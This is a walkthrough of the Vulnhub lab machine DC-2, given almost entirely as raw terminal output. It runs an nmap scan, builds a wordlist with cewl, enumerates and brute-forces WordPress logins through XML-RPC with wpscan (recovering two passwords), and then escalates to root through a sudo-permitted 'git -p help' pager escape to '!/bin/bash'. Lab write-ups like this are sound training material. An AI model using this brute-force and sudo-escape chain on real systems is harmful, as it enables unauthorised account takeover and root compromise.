Vulnhub 靶机实战系列：DC -2

root@kalilinux:~# nmap -sV -p- 192.168.188.157Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 16:41 CSTNmap scan report for 192.168.188.157Host is up (0.00078s latency).Not shown: 65533 closed portsPORT     STATE SERVICE VERSION80/tcp   open  http    Apache httpd 2.4.10 ((Debian))7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)MAC Address: 00:0C:29:90:FF:30 (VMware)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.17 seconds

root@kalilinux:/# cewl http://dc-2/ -w pwd.txt

root@kalilinux:/# wpscan --url dc-2 -e u

root@kalilinux:/# wpscan --url dc-2 -e u_______________________________________________________________         __          _______   _____                  / /  __  / ____|             /  / /| |__) | (___   ___  __ _ _ __ ®            /  / / |  ___/ ___  / __|/ _` | '_               /  /  | |     ____) | (__| (_| | | | |             /  /   |_|    |_____/ ___|__,_|_| |_|
         WordPress Security Scanner by the WPScan Team                         Version 3.7.5       Sponsored by Automattic - https://automattic.com/       @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart________________________________________________________________
[+] URL: http://dc-2/[+] Started: Thu Nov 12 18:16:07 2020
Interesting Finding(s):
[+] http://dc-2/ | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100%
[+] http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: |  - http://codex.wordpress.org/XML-RPC_Pingback_API |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: |  - https://www.iplocation.net/defend-wordpress-from-ddos |  - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <===================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: |  Wp Json Api (Aggressive Detection) |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection) |  Login Error Messages (Aggressive Detection)
[+] jerry | Found By: Wp Json Api (Aggressive Detection) |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: |  Author Id Brute Forcing - Author Pattern (Aggressive Detection) |  Login Error Messages (Aggressive Detection)
[+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
[+] Finished: Thu Nov 12 18:16:10 2020[+] Requests Done: 55[+] Cached Requests: 6[+] Data Sent: 12.342 KB[+] Data Received: 514.096 KB[+] Memory used: 134.669 MB[+] Elapsed time: 00:00:03

vim dc-2users.list
admintomjerry

root@kalilinux:/# wpscan --url http://dc-2/ -U dc-2users.list -P pwd.txt

root@kalilinux:/# wpscan --url http://dc-2/ -U dc-2users.list -P pwd.txt_______________________________________________________________         __          _______   _____                  / /  __  / ____|             /  / /| |__) | (___   ___  __ _ _ __ ®            /  / / |  ___/ ___  / __|/ _` | '_               /  /  | |     ____) | (__| (_| | | | |             /  /   |_|    |_____/ ___|__,_|_| |_|
         WordPress Security Scanner by the WPScan Team                         Version 3.7.5       Sponsored by Automattic - https://automattic.com/       @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart________________________________________________________________
[+] URL: http://dc-2/[+] Started: Fri Nov 13 11:08:01 2020
Interesting Finding(s):
[+] http://dc-2/ | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100%
[+] http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: |  - http://codex.wordpress.org/XML-RPC_Pingback_API |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: |  - https://www.iplocation.net/defend-wordpress-from-ddos |  - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <====================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 3 user/s[SUCCESS] - jerry / adipiscing                                                                                                   [SUCCESS] - tom / parturient                                                                                                     Trying admin / the Time: 00:00:50 <==========================================================> (645 / 645) 100.00% Time: 00:00:50Trying admin / log Time: 00:00:50 <==========================================================> (645 / 645) 100.00% Time: 00:00:50
[i] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
[+] Finished: Fri Nov 13 11:08:56 2020[+] Requests Done: 699[+] Cached Requests: 5[+] Data Sent: 318.158 KB[+] Data Received: 682.345 KB[+] Memory used: 216.595 MB[+] Elapsed time: 00:00:54root@kalilinux:/# 
 | Username: jerry, Password: adipiscing | Username: tom, Password: parturient

tom@DC-2:~$ export -pdeclare -x HOME="/home/tom"declare -x LANG="en_US.UTF-8"declare -x LOGNAME="tom"declare -x MAIL="/var/mail/tom"declare -x OLDPWDdeclare -x PATH="/home/tom/usr/bin:/bin/"declare -x PWD="/home/tom"declare -x SHELL="/bin/rbash"declare -x SHLVL="2"declare -x SSH_CLIENT="192.168.188.144 51118 7744"declare -x SSH_CONNECTION="192.168.188.144 51118 192.168.188.157 7744"declare -x SSH_TTY="/dev/pts/1"declare -x TERM="xterm-256color"declare -x USER="tom"tom@DC-2:~$ 

jerry@DC-2:~$ sudo -lMatching Defaults entries for jerry on DC-2:    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User jerry may run the following commands on DC-2:    (root) NOPASSWD: /usr/bin/gitjerry@DC-2:~$ sudo git -p helpusage: git [--version] [--help] [-C <path>] [-c name=value]           [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]           [-p|--paginate|--no-pager] [--no-replace-objects] [--bare]           [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]           <command> [<args>]
The most commonly used git commands are:   add        Add file contents to the index   bisect     Find by binary search the change that introduced a bug   branch     List, create, or delete branches   checkout   Checkout a branch or paths to the working tree   clone      Clone a repository into a new directory   commit     Record changes to the repository   diff       Show changes between commits, commit and working tree, etc   fetch      Download objects and refs from another repository   grep       Print lines matching a pattern   init       Create an empty Git repository or reinitialize an existing one   log        Show commit logs   merge      Join two or more development histories together   mv         Move or rename a file, a directory, or a symlink   pull       Fetch from and integrate with another repository or a local branch   push       Update remote refs along with associated objects   rebase     Forward-port local commits to the updated upstream head   reset      Reset current HEAD to the specified state   rm         Remove files from the working tree and from the index   show       Show various types of objects   status     Show the working tree status   tag        Create, list, delete or verify a tag object signed with GPG
'git help -a' and 'git help -g' lists available subcommands and some!/bin/bashroot@DC-2:/home/jerry# whoamirootroot@DC-2:/home/jerry#